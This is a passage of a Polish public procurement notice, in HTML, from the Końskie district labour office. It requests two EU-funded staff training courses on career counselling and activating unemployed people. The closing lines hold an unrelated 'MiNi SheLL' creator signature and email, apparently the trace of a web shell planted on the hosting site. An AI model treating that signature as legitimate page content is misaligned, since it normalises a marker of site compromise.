c) w uzasadnionych przypadkach dopuszcza się zmianę terminu wykonania zamówienia wskazanego przez Wykonawcę w Formularzu ofertowym, pod warunkiem ,że termin ten będzie mieścił się            w okresie wskazanym w rozdziale V niniejszej SIWZ.  
2. Wprowadzone zmiany muszą odpowiadać opisowi przedmiotu zamówienia ujętego w SIWZ.
3. Zamawiający musi wyrazić zgodę na wprowadzenie zmian o których mowa w ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.konskie.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Końskich
ul. Stanisława Staszica 2
26 - 200 Końskie
pokój nr 13 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2013 godzina 10:30, miejsce: Powiatowy Urząd Pracy w Końskich
ul. Stanisława Staszica 2
26 - 200 Końskie
pokój nr 18 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Profesjonalna Kadra współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny  Kapitał Ludzki, Priorytet VI,                   Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
Termin wykonania zamówienia : Wykonawca musi przedstawić termin realizacji szkolenia mieszczący się we wskazanym w rozdziale III SIWZ okresie  w formularzu ofertowym stanowiącym załącznik             nr 1 do SIWZ, tj. : dla Zadania 1 - wrzesień 2013 rok, dla Zadania 2 01.-18. października 2013rok..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE 1. ( CZĘŚĆ 1)

Temat szkolenia : Metoda edukacyjna- szkolenie otwarte..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Temat szkolenia : Metoda edukacyjna- szkolenie otwarte.
Cel szkolenia : 
Poznanie teoretycznych podstaw Metody Edukacyjnej oraz nabycie umiejętności praktycznego zastosowania podejścia edukacyjnego w poradnictwie zawodowym w formie indywidualnej i grupowej.

Program szkolenia musi zawierać następujące zagadnienia :
1. Podstawy teoretyczne Metody edukacyjnej :
- operacyjna teoria rozwoju,
- humanistyczna koncepcja człowieka,
- koncepcja porady,
- koncepcja świata i zawodów.
2. Praktyczne zastosowanie Metody Edukacyjnej:
- ćwiczenia stosowane na czterech etapach procesu podejmowania decyzji,
- ćwiczenia dotyczące samopoznania,
- ćwiczenia dotyczące poznania świata pracy,
- proces podejmowania decyzji.

Liczba uczestników szkolenia 		-	1 osoba (doradca zawodowy).
Liczba godzin dydaktycznych 		-	40  h.
Czas trwania szkolenia 			-	5   dni.
Termin realizacji szkolenia 		-	wrzesień 2013 r.

Rezultaty ( efekty kształcenia):
Poznanie podstaw teoretycznych oraz umiejętności zastosowania podejścia edukacyjnego w pracy z różnymi grupami klientów - osoby bezrobotne i poszukujące pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy w realizacji usług szkoleniowych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE 2. ( CZĘŚĆ 2)

Temat szkolenia : Aktywizacja zawodowa klienta do 30 roku życia i powyżej 50 roku życia - optymalizowanie skuteczności działań Urzędu Pracy - szkolenie otwarte..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Temat szkolenia : Aktywizacja zawodowa klienta do 30 roku życia i powyżej 50 roku życia - optymalizowanie skuteczności działań Urzędu Pracy - szkolenie otwarte.

Cel szkolenia : 

Celem szkolenia jest podniesienie kwalifikacji i umiejętności zawodowych pracowników PUP na rzecz aktywizacji zawodowej osób do 30 roku życia i osób 50 +. Usystematyzowanie wiedzy pracowników Publicznych Służb Zatrudnienia oraz poznanie nowoczesnych metod pracy z osobami bezrobotnymi z uwzględnieniem wskazanej grupy klientów mających trudności z odnalezieniem się na rynku pracy. 

Program szkolenia musi zawierać następujące zagadnienia:
1. Portret osoby zarejestrowanej w PUP w szczególności osób długotrwale bezrobotnych 50+ i do 30 roku życia.
2. Określenie celów i oczekiwań klientów urzędu pracy.
3. Rola i współpraca kluczowych pracowników w procesie aktywizacji zawodowej osób bezrobotnych.
4. Specyfika pracy z osobami w szczególnej sytuacji na rynku pracy.
5. Profilowanie instrumentów rynku pracy i ich odpowiedni dobór dla określonej grupy profilowej.
6. Nowoczesne metody aktywizacji osób bezrobotnych do 30 roku życia i powyżej 50 roku życia 
7. Badanie kompetencji klienta w celu wykorzystania ich w procesie aktywizacji zawodowej.
8. Działania względem osób poszukujących zatrudnienia i oddalonych od rynku pracy. 

Liczba uczestników szkolenia 		-	6 osób ( pośrednicy pracy).
Liczba godzin dydaktycznych 		-	30 h.
Czas trwania szkolenia 			-	4 dni.
Termin realizacji szkolenia 		-	od dnia 01.10.2013r.  do 18 .10.2013r.

Rezultaty ( efekty kształcenia):
Szkolenie ma na celu wprowadzenie skutecznych metod obsługi klienta, przeprowadzenie właściwej diagnozy potrzeb  i oczekiwań oraz trafnego wyboru odpowiedniej i najbardziej skutecznej formy wsparcia klienta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy w realizacji usług szkoleniowych - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com